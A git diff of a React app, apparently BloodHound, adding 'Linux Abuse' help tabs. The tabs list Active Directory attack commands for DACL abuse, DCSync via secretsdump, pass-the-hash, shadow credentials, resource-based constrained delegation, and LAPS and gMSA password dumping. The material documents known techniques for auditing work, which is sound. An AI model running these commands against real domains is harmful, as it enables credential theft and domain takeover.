+                        or prompted interactively if omitted from the command line. The new password will be prompted
+                        if omitted from the command line.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                    <p>
+                        Now that you know the target user's plain text password, you can
+                        either start a new agent as that user, or use that user's
+                        credentials in conjunction with PowerView's ACL abuse functions,
+                        or perhaps even RDP to a system the target user has access to.
+                        For more ideas and information, see the references tab.
+                    </p>
+
+                    <h4> Shadow Credentials attack </h4>
+
+                    <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                    <pre>
+                        <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                    </pre>
+
+                    <p>
+                        For other optional parameters, view the pyWhisker documentation.
+                    </p>
+                </>
+            );
+        case 'Computer':
+            if (haslaps) {
+                return (
+                    <>
+                        <p>
+                            To abuse ownership of a computer object, you may
+                            grant yourself the GenericAll privilege.
+                        </p>
+
+                        <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            Cleanup of the added ACL can be performed later on with the same tool:
+                        </p>
+
+                        <h4> Retrieve LAPS Password </h4>
+
+                        <p>
+                            Full control of a computer object is abusable when
+                            the computer's local admin account credential is
+                            controlled with LAPS. The clear-text password for
+                            the local administrator account is stored in an
+                            extended attribute on the computer object called
+                            ms-Mcs-AdmPwd. With full control of the computer
+                            object, you may have the ability to read this
+                            attribute, or grant yourself the ability to read the
+                            attribute by modifying the computer object's
+                            security descriptor.
+                        </p>
+
+                        <p>
+                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                             to retrieve LAPS passwords:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            </code>
+                        </pre>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            } else {
+                return (
+                    <>
+                        <p>
+                            To abuse ownership of a computer object, you may
+                            grant yourself the GenericAll privilege.
+                        </p>
+
+                        <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            Cleanup of the added ACL can be performed later on with the same tool:
+                        </p>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            }
+        case 'Domain':
+            return (
+                <>
+                    <p>
+                        To abuse ownership of a domain object, you may grant
+                        yourself the DcSync privileges.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'DCSync' -rights 'FullControl' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <h4> DCSync </h4>
+
+                    <p>
+                        The AllExtendedRights privilege grants {sourceName} both the
+                        DS-Replication-Get-Changes and
+                        DS-Replication-Get-Changes-All privileges, which combined
+                        allow a principal to replicate objects from the domain{' '}
+                        {targetName}.
+                    </p>
+
+                    <p>
+                        This can be abused using Impacket's secretsdump.py example script:
+                    </p>
+
+                    <pre>
+                            <code>
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            </code>
+                    </pre>
+
+                    <h4> Retrieve LAPS Passwords </h4>
+
+                    <p>
+                        If FullControl (GenericAll) is obtained on the domain,
+                        instead of granting DCSync rights, the AllExtendedRights
+                        privilege included grants {sourceName} enough{' '}
+                        privileges to retrieve LAPS passwords domain-wise.
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                         for that purpose:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'GPO':
+            return (
+                <>
+                    <p>
+                        To abuse ownership of a GPO, you may
+                        grant yourself the GenericAll privilege.
+                    </p>
+
+                    <p>
+                    Impacket's dacledit can be used for that purpose (cf.
+                    "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <p>
+                        With full control of a GPO, you may make modifications
+                        to that GPO which will then apply to the users and
+                        computers affected by the GPO. Select the target object
+                        you wish to push an evil policy down to, then use the
+                        gpedit GUI to modify the GPO, using an evil policy that
+                        allows item-level targeting, such as a new immediate
+                        scheduled task. Then wait at least 2 hours for the group
+                        policy client to pick up and execute the new evil
+                        policy. See the references tab for a more detailed write
+                        up on this abuse`;
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/Hackndo/pyGPOAbuse">pyGPOAbuse.py</a> can be used for that purpose.
+                    </p>
+                </>
+            );
+        case 'OU':
+            return (
+                <>
+                    <h4>Control of the Organization Unit</h4>
+
+                    <p>
+                        With ownership of the OU object, you may grant yourself
+                        the GenericAll privilege.
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+        case 'Container':
+            return (
+                <>
+                    <h4>Control of the Container</h4>
+
+                    <p>
+                        With ownership of the container object, you may grant yourself
+                        the GenericAll privilege.
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'containerDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+    }
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+    targetName: PropTypes.string,
+    targetType: PropTypes.string,
+    targetId: PropTypes.string,
+    haslaps: PropTypes.bool,
+};
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/Owns/Owns.jsx
+++ b/src/components/Modals/HelpTexts/Owns/Owns.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -17,8 +18,8 @@ const Owns = ({ sourceName, sourceType, targetName, targetType, targetId }) => {
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse
                     sourceName={sourceName}
                     sourceType={sourceType}
                     targetName={targetName}
@@ -26,10 +27,19 @@ const Owns = ({ sourceName, sourceType, targetName, targetType, targetId }) => {
                     targetId={targetId}
                 />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse
+                    sourceName={sourceName}
+                    sourceType={sourceType}
+                    targetName={targetName}
+                    targetType={targetType}
+                    targetId={targetId}
+                />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/Owns/References.jsx
+++ b/src/components/Modals/HelpTexts/Owns/References.jsx
@@ -43,6 +43,30 @@ const References = () => {
                 https://www.thehacker.recipes/ad/movement/dacl/addmember
             </a>
             <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting'>
+                https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/group-policies'>
+                https://www.thehacker.recipes/ad/movement/group-policies
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials'>
+                https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+            </a>
+            <br />
             <a href='https://www.thehacker.recipes/ad/movement/dacl/grant-rights'>
                 https://www.thehacker.recipes/ad/movement/dacl/grant-rights
             </a>

--- a/src/components/Modals/HelpTexts/Owns/References.jsx
+++ b/src/components/Modals/HelpTexts/Owns/References.jsx
@@ -38,6 +38,14 @@ const References = () => {
             <a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
                 https://github.com/Kevin-Robertson/Powermad#new-machineaccount
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/addmember'>
+                https://www.thehacker.recipes/ad/movement/dacl/addmember
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/grant-rights'>
+                https://www.thehacker.recipes/ad/movement/dacl/grant-rights
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/Owns/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/Owns/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({
+const WindowsAbuse = ({
     sourceName,
     sourceType,
     targetName,
@@ -912,7 +912,7 @@ const Abuse = ({
     }
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
     targetName: PropTypes.string,
@@ -921,4 +921,4 @@ Abuse.propTypes = {
     haslaps: PropTypes.bool,
 };
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/ReadGMSAPassword/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/ReadGMSAPassword/LinuxAbuse.jsx
@@ -1,0 +1,47 @@
+import React from "react";
+
+const LinuxAbuse = () => {
+    return (
+        <>
+            <p>
+                There are several ways to abuse the ability to read the GMSA
+                password. The most straight forward abuse is possible when the
+                GMSA is currently logged on to a computer, which is the intended
+                behavior for a GMSA. If the GMSA is logged on to the computer
+                account which is granted the ability to retrieve the GMSA's
+                password, simply steal the token from the process running as the
+                GMSA, or inject into that process.
+            </p>
+            <p>
+                If the GMSA is not logged onto the computer, you may create a
+                scheduled task or service set to run as the GMSA. The computer
+                account will start the sheduled task or service as the GMSA, and
+                then you may abuse the GMSA logon in the same fashion you would
+                a standard user running processes on the machine (see the
+                "HasSession" help modal for more details).
+            </p>
+            <p>
+                Finally, it is possible to remotely retrieve the password for
+                the GMSA and convert that password to its equivalent NT hash.
+                <a href="https://github.com/micahvandeusen/gMSADumper">gMSADumper.py</a> can be used for that purpose.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        "gMSADumper.py -u 'user' -p 'password' -d 'domain.local'"
+                    }
+                </code>
+            </pre>
+
+            <p>
+                At this point you are ready to use the NT hash the same way you
+                would with a regular user account. You can perform
+                pass-the-hash, overpass-the-hash, or any other technique that
+                takes an NT hash as an input.
+            </p>
+        </>
+    );
+};
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/ReadGMSAPassword/ReadGMSAPassword.jsx
+++ b/src/components/Modals/HelpTexts/ReadGMSAPassword/ReadGMSAPassword.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const ReadGMSAPassword = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/ReadGMSAPassword/References.jsx
+++ b/src/components/Modals/HelpTexts/ReadGMSAPassword/References.jsx
@@ -26,6 +26,10 @@ const References = () => {
             <a href='https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4662'>
                 https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4662
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/ReadGMSAPassword/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/ReadGMSAPassword/WindowsAbuse.jsx
@@ -1,6 +1,6 @@
 import React from "react";
 
-const Abuse = () => {
+const WindowsAbuse = () => {
     return (
         <>
             <p>
@@ -59,4 +59,4 @@ const Abuse = () => {
     );
 };
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx
@@ -1,0 +1,37 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            <p>
+                Sufficient control on a computer object is abusable when
+                the computer's local admin account credential is
+                controlled with LAPS. The clear-text password for
+                the local administrator account is stored in an
+                extended attribute on the computer object called
+                ms-Mcs-AdmPwd.
+            </p>
+
+            <p>
+                <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                 to retrieve LAPS passwords:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                    }
+                </code>
+            </pre>
+        </>
+    );
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+};
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/LinuxAbuse.jsx
@@ -14,14 +14,14 @@ const LinuxAbuse = ({ sourceName, sourceType }) => {
             </p>
 
             <p>
-                <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                <a href='https://github.com/p0dalirius/pyLAPS'>pyLAPS</a> can be used
                  to retrieve LAPS passwords:
             </p>
 
             <pre>
                 <code>
                     {
-                        'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                        'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                     }
                 </code>
             </pre>

--- a/src/components/Modals/HelpTexts/ReadLAPSPassword/ReadLAPSPassword.jsx
+++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/ReadLAPSPassword.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const ReadLAPSPassword = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse sourceName={sourceName} sourceType={sourceType} />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse sourceName={sourceName} sourceType={sourceType} />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse sourceName={sourceName} sourceType={sourceType} />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/ReadLAPSPassword/References.jsx
+++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/References.jsx
@@ -10,6 +10,9 @@ const References = () => {
             <a href='https://adsecurity.org/?p=3164'>
                 https://adsecurity.org/?p=3164
             </a>
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/readlapspassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/readlapspassword
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/ReadLAPSPassword/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/ReadLAPSPassword/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType }) => {
+const WindowsAbuse = ({ sourceName, sourceType }) => {
     return (
         <>
             <p>
@@ -40,9 +40,9 @@ const Abuse = ({ sourceName, sourceType }) => {
     );
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/WriteAccountRestrictions/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteAccountRestrictions/LinuxAbuse.jsx
@@ -1,0 +1,42 @@
+import React from 'react';
+
+const LinuxAbuse = () => {
+    return (
+        <>
+            First, if an attacker does not control an account with an
+            SPN set, a new attacker-controlled computer account can be
+            added with Impacket's addcomputer.py example script:
+            <pre>
+                <code>
+                    {
+                        "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                    }
+                </code>
+            </pre>
+            We now need to configure the target object so that the attacker-controlled
+            computer can delegate to it. Impacket's rbcd.py script can be used for that
+            purpose:
+            <pre>
+                <code>
+                    {
+                        "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                    }
+                </code>
+            </pre>
+            And finally we can get a service ticket for the service name (sname) we
+            want to "pretend" to be "admin" for. Impacket's getST.py example script
+            can be used for that purpose.
+            <pre>
+                <code>
+                    {
+                        "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                    }
+                </code>
+            </pre>
+            This ticket can then be used with Pass-the-Ticket, and could grant access
+            to the file system of the TARGETCOMPUTER.
+        </>
+    );
+};
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/WriteAccountRestrictions/References.jsx
+++ b/src/components/Modals/HelpTexts/WriteAccountRestrictions/References.jsx
@@ -29,6 +29,18 @@ const References = () => {
             <a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
                 https://github.com/Kevin-Robertson/Powermad#new-machineaccount
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl'>
+                https://www.thehacker.recipes/ad/movement/dacl
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota'>
+                https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/WriteAccountRestrictions/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteAccountRestrictions/WindowsAbuse.jsx
@@ -1,6 +1,6 @@
 import React from 'react';
 
-const Abuse = () => {
+const WindowsAbuse = () => {
     return (
         <>
             Abusing this primitive is currently only possible through the Rubeus
@@ -61,4 +61,4 @@ const Abuse = () => {
     );
 };
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/WriteAccountRestrictions/WriteAccountRestrictions.jsx
+++ b/src/components/Modals/HelpTexts/WriteAccountRestrictions/WriteAccountRestrictions.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const WriteAccountRestrictions = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
@@ -1,0 +1,583 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({
+    sourceName,
+    sourceType,
+    targetName,
+    targetType,
+    targetId,
+    haslaps,
+}) => {
+    switch (targetType) {
+        case 'Group':
+            return (
+                <>
+                    <h4> Modifying the rights </h4>
+
+                    <p>
+                        To abuse WriteDacl to a group object, you may grant
+                        yourself the AddMember privilege.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Adding to the group </h4>
+
+                    <p>
+                        You can now add members to the group.
+                    </p>
+
+                    <p>
+                        Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Finally, verify that the user was successfully added to the group:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Cleanup </h4>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'remove' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+
+        case 'User':
+            return (
+                <>
+                    <p>
+                        To abuse WriteDacl to a user object, you may grant
+                        yourself the GenericAll privilege.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
